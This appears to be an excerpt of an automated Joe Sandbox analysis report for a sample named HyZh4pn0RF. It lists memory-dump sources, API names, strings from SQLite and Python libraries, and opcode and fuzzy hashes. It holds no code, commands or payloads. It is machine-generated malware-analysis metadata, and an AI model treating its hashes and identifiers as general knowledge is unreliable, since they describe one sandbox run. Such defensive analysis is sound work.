                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BE18AA1A1AA82C1EE62CB25E5443B9B3A9FF46BC4F0401B5DE4D07B95DF3CE4478724
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2819143443-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 23d97488961b93e407653e4d04d1075f3d4a6115df0bee2f52c695c0df5d3962
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0b528eaf2fe17e41b493a18291a8f41215f8a9cc1cdb2dd531d9faf0b76fc4de
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23d97488961b93e407653e4d04d1075f3d4a6115df0bee2f52c695c0df5d3962
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B741DFB290A60281EB5A4F79DC58378BAB4EF45B79F18A238CD79412F5CF7DD8858340
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
                                                                                                                                                                                                                                                                                                  • String ID: __init__$charset_normalizer.md.UnprintablePlugin$ratio
                                                                                                                                                                                                                                                                                                  • API String ID: 2538524772-1538754472
                                                                                                                                                                                                                                                                                                  • Opcode ID: bd24d104d4e5ddc98eea7bfccf0ae522fc41dc3e0d7e104114ce5afde9d774f5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 37ac025232fe5b7f7be0f02e7355be9b0ec7c8d59d57e0972e9bbafd29155fce
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd24d104d4e5ddc98eea7bfccf0ae522fc41dc3e0d7e104114ce5afde9d774f5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 345170B2E4AA4281EA579B79DC142B9E3B1AF45B90F08A13ADD6D077B1DF3CE4418740
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: new[]
                                                                                                                                                                                                                                                                                                  • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                                                                                  • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                                                                                                  • Opcode ID: a207f01d118e0909cbb0d974f4ba2a02deab42a4a968a7174006491586c55b51
                                                                                                                                                                                                                                                                                                  • Instruction ID: 92326d0cba5fbb1cc68bdb1536b152835c9205e621dc1e0e7b9657078ef50459
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a207f01d118e0909cbb0d974f4ba2a02deab42a4a968a7174006491586c55b51
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6651D591A0E782C1F7979BB5E44067977D9AF46F88F0804B6DD4D0B696CE3CF4438628
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DoubleErr_Float_Occurred$From
                                                                                                                                                                                                                                                                                                  • String ID: bool$float$mess_ratio$str
                                                                                                                                                                                                                                                                                                  • API String ID: 627764739-3758540285
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8a02f97511670b38e9bcd773b23a0c6d973fa38f5433283c19ee847a82f0f0a0
                                                                                                                                                                                                                                                                                                  • Instruction ID: fcabca330bfb0b6869dc87e0c88860b7e96f9d9a6c3e5f82dbb070ef02a6043c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a02f97511670b38e9bcd773b23a0c6d973fa38f5433283c19ee847a82f0f0a0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 324194A2A4EA4281EA139BB9EC401BAE7B0FF55784F14E131DE6D43674DF3CE5458700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$Object_Vectorcall$Dict_Item
                                                                                                                                                                                                                                                                                                  • String ID: <module>
                                                                                                                                                                                                                                                                                                  • API String ID: 1355803777-217463007
                                                                                                                                                                                                                                                                                                  • Opcode ID: f44407c62ba38c985b018eb4be88fb5605f156d51110e078f0643a87e94a1170
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0debd0464299b348cda8a14426a79d653c0c57d7c89b2e15e7ebc34e6878c1f1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f44407c62ba38c985b018eb4be88fb5605f156d51110e078f0643a87e94a1170
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 933116B5A8BA4281EA569FB9EC502B9A3B0FF45B90F40E435CD2D06BB1DF3DE4418700
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                                                                                                                  • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                                                                                                                                                                                                                                                                  • API String ID: 2221118986-554953066
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1932231faa3f000e4fb05286e58fa8bf6b81f2d0eaf89c5c08db61906353d3de
                                                                                                                                                                                                                                                                                                  • Instruction ID: ad92689d326baa4358d603f9d9b1aebd0587a87b146acffd5916e569bbb70589
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1932231faa3f000e4fb05286e58fa8bf6b81f2d0eaf89c5c08db61906353d3de
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6122AEB2A0AB81C6EB56CF35C4806AD37A8FB46B88F404176DE4D47799DF38D892C714
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: From$String$Set_SizeUnicode_$Bytes_Complex_DoubleDoublesFloat_FrozenInternLong_PlaceTuple_
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1377717875-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1bc6b832a9b101eb94450793bee28bff6ca2690a3c262528acd6d01682900b35
                                                                                                                                                                                                                                                                                                  • Instruction ID: a6dd2d344b964ae807114c0f56d92ecc84fc3bda0612465f3c67f62f686022c5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bc6b832a9b101eb94450793bee28bff6ca2690a3c262528acd6d01682900b35
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABC182A2A4AA4646EE065B7CEC60279A7B5EF05B95F48E139DE6D073A4DF2CE051C300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2819143443-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: fff406a76837bdfc3caa631c0de594268f2a13e9ca8c66fb56096f08c5388120
                                                                                                                                                                                                                                                                                                  • Instruction ID: e5827b64d26fc42e1e372a1aca313fee84992e32fd99bcae736195493cda3208
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fff406a76837bdfc3caa631c0de594268f2a13e9ca8c66fb56096f08c5388120
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D31D8B290B60281EB575F79DC58378B2B0BF44B69F15A238CD39422E4CF7EE4858740
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Err_Unicode_$CharactersCopyFastFormatStringmemcpy
                                                                                                                                                                                                                                                                                                  • String ID: join() result is too long for a Python string$sequence item %zd: expected str instance, %.80s found
                                                                                                                                                                                                                                                                                                  • API String ID: 3966466113-1579438684
                                                                                                                                                                                                                                                                                                  • Opcode ID: bd94065e028ba6fa2eb67220a7b20d7e8b3b3746a6e474679368a889752c658a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3a47249fec091ac6b96179ab213e252a0c46b98a478d1060d9f19f43c740823d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd94065e028ba6fa2eb67220a7b20d7e8b3b3746a6e474679368a889752c658a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D61D4E3B0A64682EE528B6DD8007B9A6A0FB45BE0F05D635CD3D833E0DE3CD8468300
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                                                  • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                                                                                  • API String ID: 3510742995-2846519077
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8d24f51b3cd071761d65d7c15b46277e7c666df7a1caa9520ab571ac99f76f39
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8f7ae74b18e5c10adb408ea7e5f1fcb44e09b0b735b2de80de17caf72cc2dfe6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d24f51b3cd071761d65d7c15b46277e7c666df7a1caa9520ab571ac99f76f39
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9912BCB2A0A682C6EBA6DF25D4007A937E9FB86B88F004275DE4D07795DF3CE452C714
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$BoolCompareErr_FromLong_Object_OccurredRichSsize_t
                                                                                                                                                                                                                                                                                                  • String ID: ratio
                                                                                                                                                                                                                                                                                                  • API String ID: 2538524772-4234197119
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3df6ddb79008031f2fa932144166eaa2e045ed27a22e43e2cec9a9a03f3e1f1f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2986a4225fd2a970d8ae88cfd97163fc5f6b08d71425aba21df88cdfa85656c7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3df6ddb79008031f2fa932144166eaa2e045ed27a22e43e2cec9a9a03f3e1f1f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E5170B1A4AA0685EE565F7DDC502B8E3B0BF45B94F18A138DE3D077B1DE3DE8518200
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$Object_Vectorcall$Err_FormatMethod
                                                                                                                                                                                                                                                                                                  • String ID: bool$eligible
                                                                                                                                                                                                                                                                                                  • API String ID: 131476257-3320767611
                                                                                                                                                                                                                                                                                                  • Opcode ID: f397ca9387d6dfb1835b31036ec0af176946d4d6a5d65748a34c9214785249c7
                                                                                                                                                                                                                                                                                                  • Instruction ID: a8fa935fdce981e0055ae5f67f2bb4cb6ffc70880066ccdceaf5b7efd6638345
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f397ca9387d6dfb1835b31036ec0af176946d4d6a5d65748a34c9214785249c7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F4130B1A4B68281EF669B79EC502B5F3B1AF45784F48E03ADE6D066B5DE2CE440C310
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$memset$memmove
                                                                                                                                                                                                                                                                                                  • String ID: "%w" $%Q%s
                                                                                                                                                                                                                                                                                                  • API String ID: 3094553269-1987291987
                                                                                                                                                                                                                                                                                                  • Opcode ID: 53d4455c39d9e03709cab2d372a67f1b55016c626a0125cd516c08a04c072d0c
                                                                                                                                                                                                                                                                                                  • Instruction ID: b061adc720b0495250ce88788624284d23625d933dac8dd13503f753cdbbf2cd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 53d4455c39d9e03709cab2d372a67f1b55016c626a0125cd516c08a04c072d0c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30C1F2B2A0AA82C6EA16CF25E4402797BA4FB46BE0F144675DE6E077D4DF3CE442C714
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                                                                                                  • API String ID: 3510742995-3418467682
                                                                                                                                                                                                                                                                                                  • Opcode ID: c07ec9040e4e797a8c51df3787157870fcb5e8697a4d754e414baa0aba183f8f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 68a039e6feee6b4ca37710cf6cb6c8b99e41f091d8ac20547eef17807425000b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c07ec9040e4e797a8c51df3787157870fcb5e8697a4d754e414baa0aba183f8f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6A168B2B0E2D1CAD3A68B39D4546BD7BE5EB81B81F044176DF8A43641DE3CE446CB20
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Dealloc$Object_State_ThreadTrackTrash_beginTrash_condTrash_endUnchecked
